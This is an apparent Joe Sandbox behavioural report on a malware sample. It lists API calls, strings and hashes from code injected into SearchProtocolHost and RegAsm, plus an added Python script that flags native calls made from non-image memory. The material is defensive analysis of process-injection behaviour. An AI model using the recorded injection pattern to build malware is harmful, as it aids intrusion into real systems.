                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                Strings
                                • ExecuteOptions, xrefs: 02C946A0
                                • Execute=1, xrefs: 02C94713
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02C946FC
                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02C94725
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 02C94742
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 02C94787
                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02C94655
                                Similarity
                                • API ID:
                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                • API String ID: 0-484625025
                                APIs
                                Strings
                                Similarity
                                • API ID: __aulldvrm
                                • String ID: +$-$0$0
                                • API String ID: 1302938615-699404926
                                Strings
                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02C902E7
                                • RTL: Re-Waiting, xrefs: 02C9031E
                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02C902BD
                                Similarity
                                • API ID:
                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                • API String ID: 0-2474120054
                                Strings
                                • RTL: Resource at %p, xrefs: 02C97B8E
                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02C97B7F
                                • RTL: Re-Waiting, xrefs: 02C97BAC
                                Similarity
                                • API ID:
                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 0-871070163
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C9728C
                                Strings
                                • RTL: Resource at %p, xrefs: 02C972A3
                                • RTL: Re-Waiting, xrefs: 02C972C1
                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02C97294
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                • API String ID: 885266447-605551621
                                • Opcode ID: 5da5595626f8e2b951b384901c9e9ec19f4fb04e9f078ee02180ec386aacf7b0
                                • Instruction ID: b8f4cf5eb21777e358f3336924889e29eaa571c995878fb3b7e7b706ce12c13e
                                • Opcode Fuzzy Hash: 5da5595626f8e2b951b384901c9e9ec19f4fb04e9f078ee02180ec386aacf7b0
                                • Instruction Fuzzy Hash: 2C413271711612ABDB20CE25CC85B66B7A5FF84718F100618FD55EB280DB31E896CBD1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID:
                                • String ID: $$@
                                • API String ID: 0-1194432280
                                • Opcode ID: ab89e87e7996c26e8080533a0ae98eb3f6a95cbb7438d0cf2ceccb2d96d10bae
                                • Instruction ID: 6c119f55079e94fc3bc772e0bcfa662e4b67cd132a649d98670030b719368874
                                • Opcode Fuzzy Hash: ab89e87e7996c26e8080533a0ae98eb3f6a95cbb7438d0cf2ceccb2d96d10bae
                                • Instruction Fuzzy Hash: A2814B75D402799BDB21DB54CC48BEEB7B8AF48714F0041EAEA09B7240D7309E85CFA1

                                Execution Graph

                                Execution Coverage:3.1%
                                Dynamic/Decrypted Code Coverage:4.1%
                                Signature Coverage:2.2%
                                Total number of Nodes:458
                                Total number of Limit Nodes:75
                                execution_graph: rendered node/edge data of the execution graph (not reproduced as text). Function nodes lie at addresses 2c09e60 to 2c2cc30, with call targets at 33b2ad0 to 33b4650 labelled LdrInitializeThunk. APIs reached in the graph: CoInitialize, CoUninitialize, CreateProcessInternalW, CreateThread, FindClose, FindFirstFileW, FindNextFileW, GetFileAttributesW, LdrInitializeThunk, LdrLoadDll, NtAllocateVirtualMemory, NtClose, NtCreateFile, NtDeleteFile, NtReadFile, PostThreadMessageW, RtlAllocateHeap, RtlDosPathNameToNtPathName_U, RtlFreeHeap, SetErrorMode, Sleep.

                                Control-flow Graph

                                control_flow_graph (legend: Executed / Not Executed): basic-block edge list of the function at 2c09ec0, blocks 2c09ec0-2c0a200 through 2c0a7ae-2c0a7b7; the rendered graph is not reproduced as text. The only call edge in the graph is at 2c0a6a1, which calls 2c2b6d0.
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !Y$!Y0=b^$&$,$0=b^$4"$9$9k$;1$;s$<$A$ED$M$W%no$X$`*$i$no$no$w$z$ $g$i$~
                                • API String ID: 0-1950466578
                                • Opcode ID: 2444ce7c013ccc3866e766800ecaafa545ac4ebde1a67ca04ab43f54ad9863bb
                                • Instruction ID: 0c9c3ae601062d0b5758deca0c91df7bb81b406ae043d2a6352a31d5cef05888
                                • Opcode Fuzzy Hash: 2444ce7c013ccc3866e766800ecaafa545ac4ebde1a67ca04ab43f54ad9863bb
                                • Instruction Fuzzy Hash: FC329BB0D05269CBEB24CF59C998BEDBBB2BB45308F1085D9C50E7B280C7B55A89CF51
                                APIs
                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 02C1CC0F
                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02C1CC4E
                                • FindClose.KERNELBASE(?), ref: 02C1CC59
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNext
                                • String ID:
                                • API String ID: 3541575487-0
                                • Opcode ID: d7e1d38b93dafd8dabd6d6de46cff0cb059a3ba5935130805c74bf067f894bd5
                                • Instruction ID: 98e77191db38faae17557eb9881a13fd4152c3cb6900569968d731b62f03c03e
                                • Opcode Fuzzy Hash: d7e1d38b93dafd8dabd6d6de46cff0cb059a3ba5935130805c74bf067f894bd5
                                • Instruction Fuzzy Hash: 72317271A40718BBDB20DF60CC85FEF77BD9B84704F144559BA08A7180DAB0AF859BA1
                                APIs
                                • NtCreateFile.NTDLL(B54A54D0,?,?,?,?,?,00000037,?,?,?,?), ref: 02C297B8
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFile
                                • String ID:
                                • API String ID: 823142352-0
                                • Opcode ID: 7790a154dca7401fd1aa453f7d3794e88b438efa65bc9697a63e31856814e4b9
                                • Instruction ID: 6a01d853ada0d7a4c44b56351359666376b68cdc3fa89f223de56ac9155b8499
                                • Opcode Fuzzy Hash: 7790a154dca7401fd1aa453f7d3794e88b438efa65bc9697a63e31856814e4b9
                                • Instruction Fuzzy Hash: 5331D5B5A01248ABCB14DF98C880EEEB7B9EF8C300F108209F918A7340D734A941CFA5
                                APIs
                                • NtReadFile.NTDLL(B54A54D0,?,?,?,?,?,00000037,?,?), ref: 02C29903
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileRead
                                • String ID:
                                • API String ID: 2738559852-0
                                • Opcode ID: 1b697acd32260530dd58febba1ee2c97b8feef1ab5b6de207efa1882a8c9b81f
                                • Instruction ID: f2c325134b0b76e4c67edfcc35b4d53b58dfbe91f5258b5facd66deb3ee8131a
                                • Opcode Fuzzy Hash: 1b697acd32260530dd58febba1ee2c97b8feef1ab5b6de207efa1882a8c9b81f
                                • Instruction Fuzzy Hash: B531E6B5A00208ABDB14DF98C880EEFB7B9EF8C314F108609F918A7240D774A951CFA5
                                APIs
                                • NtAllocateVirtualMemory.NTDLL(B54A54D0,?,02C284BF,00000000,00000004,00003000,?,?,?,?,?,02C284BF,02C1231E), ref: 02C29BD2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateMemoryVirtual
                                • String ID:
                                • API String ID: 2167126740-0
                                • Opcode ID: 96b72d362373cc5cc379d3f598795e46e598ffca6a52a36b71e949e57889418d
                                • Instruction ID: 326f5fa1eea5b1553ac61fd4735afe09c147e32c1027fc82eb97dae7354b79a7
                                • Opcode Fuzzy Hash: 96b72d362373cc5cc379d3f598795e46e598ffca6a52a36b71e949e57889418d
                                • Instruction Fuzzy Hash: 6F21F9B5A00218ABDB10DF98DC41EEFB7B9EF88700F108619F918A7240DB74A911CFA5
                                APIs
                                • NtDeleteFile.NTDLL(B54A54D0), ref: 02C299A3
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteFile
                                • String ID:
                                • API String ID: 4033686569-0
                                • Opcode ID: c2d1e30d9603c87b9e5c6bc25496436e0077ce67db9531472bcf6168351679f3
                                • Instruction ID: c50502ffcd435ce115c873a723ffd192492b17e29eadb4f7775770bfa0d279b9
                                • Opcode Fuzzy Hash: c2d1e30d9603c87b9e5c6bc25496436e0077ce67db9531472bcf6168351679f3
                                • Instruction Fuzzy Hash: F2117071640218BAD720EB68CC41FEBB3ADEF89714F10850DFA48A7280EBB56505CBB5
                                APIs
                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C299E4
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction ID: 356e4bb4abc22eacab8177ba48d439096f72f37f56fdd18716ef1c7731d8cac3
                                • Opcode Fuzzy Hash: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction Fuzzy Hash: 30E046362506147BD620AAAACC50FABB76DDBC5710F008415FA48AB292C671BA018AE0
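The "APIs" entries above (NtCreateFile, NtReadFile, NtAllocateVirtualMemory, NtDeleteFile and NtClose resolved in NTDLL, plus the FindFirstFileW/FindNextFileW/FindClose enumeration loop) all sit in the SearchProtocolHost snapshot at offset 02C00000, which the report marks "based on PE: false": executable memory with no image on disk behind it. The script below is an added example written for this page; it is not Joe Sandbox code and not part of the report. It parses entries in the layout shown above into records and lists, per process and region, the native calls made from non-image-backed memory. The sample input is constructed from entries on this page; the regular expressions and the "based on PE: false" heuristic are this example's own assumptions about the report text, not a documented format.

```python
"""Triage helper for Joe Sandbox function-level disassembly listings.
Added example, not Joe Sandbox code; the line patterns are assumptions about
the report text as shown on the page, not a documented format.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional

# "• NtCreateFile.NTDLL(B54A54D0,?,?), ref: 02C297B8"
API_RE = re.compile(r"^[•*\-]?\s*(?P<name>\w+)\.(?P<module>[\w.]+)\([^)]*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
# "Source File: <dump>.sdmp, Offset: 02C00000, based on PE: false"
SOURCE_RE = re.compile(r"Source File:\s*(?P<file>\S+?\.sdmp),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")
# "Snapshot File: hcaresult_<pid index>_<run>_<base>_<image>.jbxd"
SNAPSHOT_RE = re.compile(r"Snapshot File:\s*hcaresult_(?P<pid>\d+)_\d+_[0-9A-Fa-f]+_(?P<proc>[^.\s]+)\.jbxd")
# The "Instruction Fuzzy Hash" line closes every entry.
END_RE = re.compile(r"Instruction Fuzzy Hash:\s*(?P<hash>[0-9A-Fa-f]+)")


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)   # (api name, module, call-site address)
    base: str = ""                              # region base from "Offset:"
    pe_backed: Optional[bool] = None            # the report's "based on PE" flag
    process: str = ""                           # image name taken from the snapshot file
    fuzzy_hash: str = ""


def parse_entries(report_text):
    """Split the listing into one FunctionEntry per disassembled function."""
    entries, cur = [], FunctionEntry()
    for raw in report_text.splitlines():
        line = raw.strip()
        if m := API_RE.match(line):
            cur.apis.append((m["name"], m["module"].upper(), m["ref"].upper()))
        elif m := SOURCE_RE.search(line):
            cur.base = m["off"].upper()
            cur.pe_backed = m["pe"] == "true"
        elif m := SNAPSHOT_RE.search(line):
            cur.process = m["proc"]
        elif m := END_RE.search(line):
            cur.fuzzy_hash = m["hash"].upper()
            entries.append(cur)
            cur = FunctionEntry()
    return entries


def api_inventory(entries):
    """Map process image -> sorted distinct API names seen in its functions."""
    inv = defaultdict(set)
    for e in entries:
        for name, _module, _ref in e.apis:
            inv[e.process].add(name)
    return {proc: sorted(names) for proc, names in inv.items()}


def native_calls_from_unbacked_memory(entries):
    """Nt*/Zw* calls into NTDLL made from regions marked "based on PE: false".

    Image-less executable memory that talks to the native API directly is the
    usual footprint of an unpacked payload running inside a hijacked host
    process.  Returns {(process, region base): sorted API names}.
    """
    hits = defaultdict(set)
    for e in entries:
        if e.pe_backed is not False:        # skip image-backed and unknown regions
            continue
        for name, module, _ref in e.apis:
            if module == "NTDLL" and name.startswith(("Nt", "Zw")):
                hits[(e.process, e.base)].add(name)
    return {key: sorted(names) for key, names in hits.items()}


# Constructed sample input: three entries in the page's layout (headings trimmed).
SAMPLE_REPORT = """\
APIs
• FindFirstFileW.KERNELBASE(?,00000000), ref: 02C1CC0F
• FindNextFileW.KERNELBASE(?,00000010), ref: 02C1CC4E
• FindClose.KERNELBASE(?), ref: 02C1CC59
• Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
• Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
• Instruction Fuzzy Hash: 72317271A40718BBDB20DF60CC85FEF77BD9B84704F144559BA08A7180DAB0AF859BA1
APIs
• NtCreateFile.NTDLL(B54A54D0,?,?,?,?,?,00000037,?,?,?,?), ref: 02C297B8
• Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
• Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
• Instruction Fuzzy Hash: 5331D5B5A01248ABCB14DF98C880EEEB7B9EF8C300F108209F918A7340D734A941CFA5
APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02C9728C
• Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
• Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
• Instruction Fuzzy Hash: 2C413271711612ABDB20CE25CC85B66B7A5FF84718F100618FD55EB280DB31E896CBD1
"""

if __name__ == "__main__":
    found = parse_entries(SAMPLE_REPORT)
    print("functions:", len(found))
    print("inventory:", api_inventory(found))
    print("native calls from non-image memory:", native_calls_from_unbacked_memory(found))
```

Run against the full report text instead of SAMPLE_REPORT to get the per-process picture in one pass; the RegAsm region at 02BF0000 is image-backed and yields no hit, while the SearchProtocolHost region at 02C00000 surfaces every Nt* call made by the injected code.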
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 0cbd71d2c98069830d34a068e024db0dc14f02505c7f23f5047fede6c5eccd94
                                • Instruction ID: 992b49557739de907d34fe25967c2710de1ecdead819bce4529970177c071af7
                                • Opcode Fuzzy Hash: 0cbd71d2c98069830d34a068e024db0dc14f02505c7f23f5047fede6c5eccd94
                                • Instruction Fuzzy Hash: 01900239625844129140B15D48C4546500597E0301B55C015E0424954C8B158F565361
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 02C113A7
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                APIs
                                • Sleep.KERNELBASE(000007D0), ref: 02C2404B
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: net.dll$wininet.dll
                                • API String ID: 3472027048-1269752229
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: InitializeUninitialize
                                • String ID: @J7<
                                • API String ID: 3442037557-2016760708
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02C14B42
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                APIs
                                • CreateProcessInternalW.KERNELBASE(?,?,?,?,02C1889E,00000010,?,?,?,00000044,?,00000010,02C1889E,?,?,?), ref: 02C29E10
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID:
                                • API String ID: 2186235152-0
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09EA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02C09EA2
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                APIs
                                • RtlDosPathNameToNtPathName_U.NTDLL(?,?,?,?), ref: 02C28950
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$NameName_
                                • String ID:
                                • API String ID: 3514427675-0
                                APIs
                                • RtlAllocateHeap.NTDLL(02C11FC6,?,02C25BA7,02C11FC6,02C25B7F,02C25BA7,?,02C11FC6,02C25B7F,00001000,?,?,00000000), ref: 02C29D0C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                APIs
                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,8B5A8279,00000007,00000000,00000004,00000000,02C14346,000000F4), ref: 02C29D5C
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C18909
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                APIs
                                • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02C18909
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: AttributesFile
                                • String ID:
                                • API String ID: 3188754299-0
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,?,02C122C0,02C284BF,02C25B7F,02C12286), ref: 02C18700
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,?,02C122C0,02C284BF,02C25B7F,02C12286), ref: 02C18700
                                Memory Dump Source
                                • Source File: 00000006.00000002.2671544693.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C00000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_2c00000_SearchProtocolHost.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                Memory Dump Source
                                • Source File: 00000006.00000002.2673808272.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3230000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2673808272.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3230000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID:
                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                • API String ID: 0-3558027158
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.2674024939.0000000003340000.00000040.00001000.00020000.00000000.sdmp, Offset: 03340000, based on PE: true
                                • Associated: 00000006.00000002.2674024939.0000000003469000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.000000000346D000.00000040.00001000.00020000.00000000.sdmp
                                • Associated: 00000006.00000002.2674024939.00000000034DE000.00000040.00001000.00020000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_3340000_SearchProtocolHost.jbxd
                                Similarity
                                • API ID: ___swprintf_l
                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                • API String ID: 48624451-2108815105
                                Strings
                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033E4742
                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033E46FC
                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 033E4787
